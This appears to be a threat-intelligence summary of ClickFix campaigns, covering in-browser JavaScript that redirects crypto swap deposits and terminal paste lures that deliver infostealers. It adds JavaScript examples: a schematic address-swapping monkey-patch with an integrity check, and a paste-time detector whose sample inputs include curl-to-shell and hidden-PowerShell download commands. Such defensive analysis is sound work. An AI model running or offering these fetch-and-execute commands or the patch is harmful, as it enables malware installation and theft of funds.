Mallory

ClickFix Social Engineering Expands to Browser JavaScript and Terminal Paste Attacks

cryptocurrency-platform-risk, search-ad-manipulation, voice-social-engineering
Updated March 21, 2026 at 02:32 PM · 2 sources


Threat actors are expanding ClickFix-style social engineering beyond simple “copy/paste this command” lures. One campaign abuses Pastebin comments to push victims toward executing attacker-supplied JavaScript in their own browser in order to hijack cryptocurrency swap flows. The comments promote a fake “Swapzone.io arbitrage exploit” and route users through a rawtext[.]host link to a Google Doc (“Swapzone.io – ChangeNOW Profit Method”) that instructs them to run JavaScript; once executed, the script modifies the swap flow within the user's session and redirects funds to attacker-controlled wallets. The reporting notes this may be an early example of ClickFix being used to directly alter webpage functionality for theft rather than to install malware.
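As an added illustration (not code from the page or from the reporting it summarizes), the following JavaScript sketches the mechanism described above and one client-side check against it: a stand-in swap app whose handler is monkey-patched by a "pasted" snippet so the deposit address is rewritten, a baseline-and-verify integrity check that notices the replaced function, and a frozen copy of the same app on which the identical patch throws. Every name here (makeSwapApp, submitSwap, fetchQuote, the two addresses) is a hypothetical stand-in; the payload is schematic and does no network I/O.

```javascript
// Added example, not code from the page or from the reporting it summarizes.
// All names (makeSwapApp, submitSwap, fetchQuote, both addresses) are hypothetical.

// --- 1. Stand-in for a swap site's legitimate client-side logic ------------
const LEGIT_DEPOSIT = "bc1q-legit-deposit-address-constructed";       // constructed
const ATTACKER_DEPOSIT = "bc1q-attacker-deposit-address-constructed"; // constructed

function makeSwapApp() {
  return {
    // Stand-in for the backend quote call (no real I/O).
    fetchQuote(order) {
      return { depositAddress: LEGIT_DEPOSIT, amount: order.amount };
    },
    // The site's own handler: fetch a quote and return what the UI will show.
    submitSwap(order) {
      const quote = this.fetchQuote(order);
      return { ...order, depositAddress: quote.depositAddress };
    },
  };
}

// --- 2. Integrity baseline captured at page load, before any foreign code --
function snapshotIntegrity(app, names) {
  return new Map(names.map((n) => [n, app[n]]));
}

// Returns the names whose function object is no longer the one captured at load.
function verifyIntegrity(app, baseline) {
  return [...baseline].filter(([name, fn]) => app[name] !== fn).map(([name]) => name);
}

// --- 3. Hardening: a frozen object rejects property reassignment -----------
function hardenedCopy(app) {
  return Object.freeze({ ...app });
}

// --- 4. Schematic of what a pasted in-page snippet does ---------------------
// Wraps the real handler and rewrites the one field the victim relies on.
function simulatePastedPayload(app) {
  "use strict"; // strict mode turns a blocked write into a TypeError
  const original = app.submitSwap;
  app.submitSwap = function (order) {
    const result = original.call(this, order);
    result.depositAddress = ATTACKER_DEPOSIT;
    return result;
  };
}

// "patched" if the override succeeded, otherwise the error class that stopped it.
function tamperOutcome(app) {
  try {
    simulatePastedPayload(app);
    return "patched";
  } catch (e) {
    return "blocked: " + e.constructor.name;
  }
}

// --- 5. Demo -----------------------------------------------------------------
function runDemo() {
  const order = { from: "ETH", to: "BTC", amount: 1 };

  const app = makeSwapApp();
  const baseline = snapshotIntegrity(app, ["fetchQuote", "submitSwap"]);
  const before = app.submitSwap(order);
  const cleanCheck = verifyIntegrity(app, baseline);     // []
  const unhardenedOutcome = tamperOutcome(app);          // "patched"
  const after = app.submitSwap(order);                   // attacker address shown
  const tamperedCheck = verifyIntegrity(app, baseline);  // ["submitSwap"]

  const hardened = hardenedCopy(makeSwapApp());
  const hardenedOutcome = tamperOutcome(hardened);       // "blocked: TypeError"
  const hardenedResult = hardened.submitSwap(order);     // still the legit address

  return { before, after, cleanCheck, unhardenedOutcome, tamperedCheck, hardenedOutcome, hardenedResult };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

Caveat on the design: a snippet the victim pastes runs with the page's full authority, so it can equally rewrite the DOM, wrap the network layer, or redefine the check itself; freezing and reference checks raise the cost of the simplest override, they do not close the class. The dependable control is the one the story implies: users must not run code from a document in their browser, which is also why current browsers make DevTools refuse pasted code until the user types an explicit "allow pasting" confirmation.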

Separately, Objective-See documented ClickFix as a rapidly growing infection technique on macOS and Windows that relies on persuading users to paste attacker-controlled commands into a terminal, enabling execution without exploiting software vulnerabilities and potentially bypassing macOS protections such as Gatekeeper and Notarization. The post describes a practical macOS-focused mitigation that intervenes at “paste time” to disrupt many ClickFix attempts, implemented in BlockBlock, while also outlining limitations and potential bypasses—reinforcing that ClickFix is primarily a user-manipulation problem that defenders should address with both technical controls and user-execution friction.
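The Objective-See mitigation above works at paste time; as an added example that is neither the page's code nor BlockBlock's implementation, the Node.js script below shows the kind of heuristic such a hook can apply. It scores a candidate clipboard payload against the command shapes the reports on this page describe: a remote download piped into a shell or PowerShell, a `bash -c "$(curl ...)"` substitution like the altered Homebrew installer, a base64 decode stage, `curl -k` with TLS verification disabled piped into `zsh`, quarantine-attribute removal, hidden or policy-bypassing PowerShell, silent `msiexec`, and a decoy "I am not a robot" comment. The rules, weights and threshold are this example's own choices, and the sample pastes are constructed (hosts use the reserved `.invalid` TLD); only the Homebrew line is a real, legitimate command, kept in deliberately to show the limitation the text points at.

```javascript
// Added example, not code from the page and not BlockBlock's logic. A paste-time
// heuristic scoring a clipboard payload against command shapes this page's
// reports describe. Rule set, weights and threshold are this example's own.
const RULES = [
  { id: "download_piped_to_interpreter", weight: 3,
    re: /\b(curl|wget|iwr|irm|Invoke-(WebRequest|RestMethod))\b[^|\n]*\|\s*(sudo\s+)?((ba|z|da|k)?sh|powershell|pwsh|python3?|perl|node)\b/i },
  { id: "shell_c_with_download_substitution", weight: 3,
    re: /\b(ba|z)?sh\s+-c\s+["']?\$\(\s*(curl|wget)\b/i },
  { id: "base64_decode_stage", weight: 2,
    re: /base64\s+(-d|-D|--decode)\b|FromBase64String|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+\/=]{20,}/i },
  { id: "tls_verification_disabled", weight: 2,
    re: /\bcurl\b[^|\n]*\s(-k|--insecure)\b|\bwget\b[^|\n]*--no-check-certificate/i },
  { id: "quarantine_attribute_removed", weight: 2,
    re: /\bxattr\b[^\n]*(com\.apple\.quarantine|\s-c\b)/i },
  { id: "hidden_or_unrestricted_powershell", weight: 2,
    re: /\b(powershell|pwsh)\b[^\n]*(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass)/i },
  { id: "mshta_or_silent_msiexec", weight: 2,
    re: /\bmshta\b|\bmsiexec\b[^\n]*\/(q|qn|quiet)\b/i },
  { id: "osascript_inline", weight: 1, re: /\bosascript\s+-e\b/i },
  { id: "verification_decoy_comment", weight: 2,
    re: /#[^\n]*(not a robot|recaptcha|verification id|verify you are human)/i },
  { id: "long_opaque_blob", weight: 1, re: /[A-Za-z0-9+\/]{80,}={0,2}/ },
];

const PROMPT_THRESHOLD = 3; // at or above this, the paste hook should interrupt the user

// Score one clipboard payload; returns the matched rule ids and a verdict.
function assessPaste(text) {
  const matched = RULES.filter((r) => r.re.test(text));
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  return {
    score,
    hits: matched.map((r) => r.id),
    verdict: score >= PROMPT_THRESHOLD ? "prompt" : "allow",
  };
}

// Constructed sample pastes. Hosts use the reserved .invalid TLD; the Homebrew
// line is the project's real, legitimate install command (a known false positive).
const SAMPLES = {
  curl_pipe_bash: "curl -fsSL https://example.invalid/fix.sh | bash",
  base64_then_sh: 'echo "ZWNobyBjb25zdHJ1Y3RlZA==" | base64 -d | sh # ✅ I am not a robot', // blob is base64("echo constructed")
  win_run_box:    "cmd /c curl -s http://example.invalid/a | powershell -nop -w hidden -",
  insecure_zsh:   "curl -k -s https://example.invalid/s | zsh",
  homebrew_legit: '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
  benign:         "ls -la ~/Downloads && git status",
};

// Assess every sample; keyed by sample name.
function assessAll(samples = SAMPLES) {
  return Object.fromEntries(Object.entries(samples).map(([k, v]) => [k, assessPaste(v)]));
}

for (const [name, result] of Object.entries(assessAll())) {
  console.log(name.padEnd(15), result.verdict.padEnd(7), String(result.score).padEnd(3), result.hits.join(","));
}
```

The Homebrew one-liner scores exactly at the threshold, which is the point: the legitimate installer and the typosquatted copy have the same shape and differ only in the host, so a paste-time hook can add friction and surface the URL for inspection but cannot decide on its own. It also only sees what is pasted into a terminal; the Script Editor variant covered under Related Stories never touches that path.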

Timeline

  1. Feb 15, 2026

    Researchers document in-browser JavaScript attack targeting Swapzone users

    BleepingComputer analyzed the campaign and reported that the first-stage JavaScript loads an obfuscated second-stage payload from rawtext[.]host, which overrides Swapzone's legitimate swap-handling logic. The report described the activity as a notable ClickFix-style campaign using in-browser JavaScript to alter webpage functionality for cryptocurrency theft.

  2. Feb 15, 2026

    Threat actors launch Pastebin-based ClickFix crypto swap hijacking campaign

    Threat actors began abusing Pastebin comments to lure cryptocurrency users with supposed Swapzone/ChangeNOW arbitrage documentation, directing them to a Google Doc that instructs victims to run malicious JavaScript in their browser. The payload injects code into Swapzone sessions to replace legitimate Bitcoin deposit addresses with attacker-controlled wallets and manipulate displayed swap details.


Sources

objective-see.org
Objective-See's Blog
February 15, 2026 at 12:00 AM

Related Stories

ClickFix Social Engineering Drives Multi-Platform Malware Delivery

Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.

1 month ago
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages

Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.

1 month ago
ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer

Researchers identified a **ClickFix-style** campaign targeting macOS users that swaps Terminal-based execution for **Script Editor** to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the `applescript://` URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses `curl` with TLS certificate validation disabled, and pipes the response directly into `zsh` for in-memory execution. The activity, discovered by **Jamf Threat Labs**, ultimately downloads and launches a Mach-O variant of **Atomic Stealer**, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes `dryvecar.com`, `storage-fixes.squarespace.com`, and `cleanupmac.mssg.me`.

3 weeks ago
